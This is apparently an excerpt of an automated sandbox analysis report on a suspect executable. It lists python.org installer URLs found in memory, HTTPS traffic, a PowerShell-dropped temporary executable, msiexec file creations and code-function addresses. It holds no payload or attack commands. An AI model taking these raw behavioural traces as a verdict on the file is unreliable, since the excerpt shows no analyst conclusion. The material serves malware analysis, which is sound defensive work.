Source: tmpaf99aaqq.exe, 00000008.00000003.1852201281.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000008.00000003.1852071828.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1858307189.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856495603.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855497238.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854580162.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854387653.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855216740.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000002.2135710147.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2124156110.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2130908241.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133299039.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2120636048.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133558161.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2124870266.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119494105.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119794834.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2198030648.00000000013F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_d.msi
Source: python-3.11.0-amd64.exe, 0000001C.00000003.2292795037.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2299721736.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2303450903.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2332188002.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2310594845.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2323651297.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2319843843.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2326738566.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2215485922.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2215847068.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2295838869.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2327529754.00000000007B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_d.msi$
Source: python-3.11.0-amd64.exe, 00000018.00000003.2122476748.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000018.00000003.2121692854.00000000009DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_d.msi(
Source: python-3.11.0-amd64.exe, 00000019.00000003.2198030648.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2201291201.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2132930857.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2200451190.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2196483695.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2130912403.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2195957492.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2197476998.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2196956584.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2198685503.00000000013F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_d.msi0
Source: tmpaf99aaqq.exe, 00000009.00000003.1858307189.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856495603.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855497238.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854580162.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854387653.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855216740.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2222164091.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2380771165.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2378303173.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2650221167.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2221803838.0000000000FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_d.msiN
Source: python-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_d.msiX
Source: python-3.11.0-amd64.exe, 00000018.00000003.2122476748.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000018.00000003.2121692854.00000000009DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_d.msih
Source: tmpaf99aaqq.exe, 00000008.00000003.1852201281.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000008.00000003.1852071828.00000000005CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_d.msivHc
Source: tmpaf99aaqq.exe, 00000008.00000003.1852201281.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000008.00000003.1852071828.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1858307189.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856495603.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855497238.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854580162.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854387653.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855216740.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2124156110.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2124870266.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000018.00000003.2122476748.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000018.00000003.2121692854.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2198030648.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2201291201.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2132930857.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2200451190.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2196483695.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2130912403.00000000013F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_pdb.msi
Source: python-3.11.0-amd64.exe, 0000001A.00000003.2201234395.0000000000F31000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001A.00000003.2200793133.0000000000F31000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001A.00000003.2203306342.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001A.00000003.2202426903.0000000000F31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_pdb.msi&U
Source: python-3.11.0-amd64.exe, 00000018.00000003.2122476748.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000018.00000003.2121692854.00000000009DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_pdb.msi(
Source: python-3.11.0-amd64.exe, 00000017.00000002.2135710147.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2130908241.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133299039.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2120636048.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133558161.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119494105.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119794834.00000000013B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_pdb.msi5
Source: python-3.11.0-amd64.exe, 0000001C.00000003.2292795037.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2299721736.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2303450903.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2332188002.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2310594845.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2323651297.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2319843843.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2326738566.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2215485922.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2215847068.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2295838869.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2327529754.00000000007B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_pdb.msiD
Source: python-3.11.0-amd64.exe, 00000017.00000002.2135710147.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2130908241.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133299039.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2120636048.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133558161.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119494105.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119794834.00000000013B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_pdb.msiU
Source: python-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_pdb.msiX
Source: python-3.11.0-amd64.exe, 0000001C.00000003.2292795037.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2299721736.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2303450903.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2332188002.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2310594845.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2323651297.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2319843843.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2326738566.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2215485922.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2215847068.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2295838869.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2327529754.00000000007B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_pdb.msid
Source: tmpaf99aaqq.exe, 00000009.00000003.1858307189.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856495603.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855497238.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854580162.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854387653.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855216740.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/test_pdb.msi~)C
Source: tmpaf99aaqq.exe, 00000008.00000003.1852201281.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000008.00000003.1852201281.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000008.00000003.1852071828.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000008.00000003.1852071828.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854580162.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854387653.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1857214225.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856831735.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856053142.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1857500628.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855774814.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1857792733.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855216740.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1858307189.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855497238.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856495603.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2128018926.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119494105.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119794834.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2198030648.000000000140C000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2196956584.000000000140C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/ucrt.msi
Source: python-3.11.0-amd64.exe, 00000018.00000003.2122476748.00000000009D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/ucrt.msiA
Source: python-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/ucrt.msib~
Source: python-3.11.0-amd64.exe, 0000001F.00000003.2650221167.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2222164091.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/ucrt.msid
Source: python-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.2041383827.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.2039788578.0000000000C7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/amd64/ucrt.msiy~
Source: powershell.exe, 00000004.00000002.1650366149.0000029353840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe
Source: 3Af7PybsUi.exe, 00000003.00000003.1855816456.000001EC89935000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1856655752.000001EC89996000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855667301.000001EC898D2000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1854485559.000001EC896F1000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855155972.000001EC8981B000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1856013049.000001EC899D0000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1856940856.000001EC899AA000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855919539.000001EC89970000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855535432.000001EC89895000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1362365322.000001EC89B35000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855365547.000001EC89858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/watch?v=QB7ACr7pUuE
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownHTTPS traffic detected: 151.101.0.223:443 -> 192.168.2.7:49715 version: TLS 1.2

System Summary

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeJump to dropped file
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3bf53e.msi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{1ED03561-12AC-4A6A-AA85-583281BF0121}
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF907.tmp
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3bf541.msi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3bf541.msi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3bf542.msi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{B28E4BED-428C-40CB-9A29-41E46263246D}
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFDBB.tmp
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3bf545.msi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3bf545.msi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3bf546.msi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{74A2D2BF-BD4F-4D82-812F-EDEB21EA443F}
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4B1.tmp
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3bf549.msi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3bf549.msi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3bf54a.msi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{CB7E1801-9FB8-4763-A369-1D7F290AB24D}
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1972.tmp
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeFile deleted: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262910000_2_00007FF726291000
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262B4F100_2_00007FF7262B4F10
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262B5C740_2_00007FF7262B5C74
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262A1F300_2_00007FF7262A1F30
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262AFBD80_2_00007FF7262AFBD8
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262B57280_2_00007FF7262B5728
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262B2F200_2_00007FF7262B2F20
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF726299FCD0_2_00007FF726299FCD
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF72629979B0_2_00007FF72629979B
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262A50400_2_00007FF7262A5040
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262AD8800_2_00007FF7262AD880
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262A10740_2_00007FF7262A1074
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262A28C00_2_00007FF7262A28C0
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262ACD6C0_2_00007FF7262ACD6C
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262995FB0_2_00007FF7262995FB
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262A0E700_2_00007FF7262A0E70
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF726298B200_2_00007FF726298B20
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262B0B840_2_00007FF7262B0B84
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262B33BC0_2_00007FF7262B33BC
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262A73F40_2_00007FF7262A73F4
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262AFBD80_2_00007FF7262AFBD8
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262A14840_2_00007FF7262A1484
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262A0C640_2_00007FF7262A0C64
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262A2CC40_2_00007FF7262A2CC4
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262B518C0_2_00007FF7262B518C
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262A91B00_2_00007FF7262A91B0
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262AD2000_2_00007FF7262AD200
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262B8A380_2_00007FF7262B8A38
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262A12800_2_00007FF7262A1280
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262A0A600_2_00007FF7262A0A60
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262A7AAC0_2_00007FF7262A7AAC
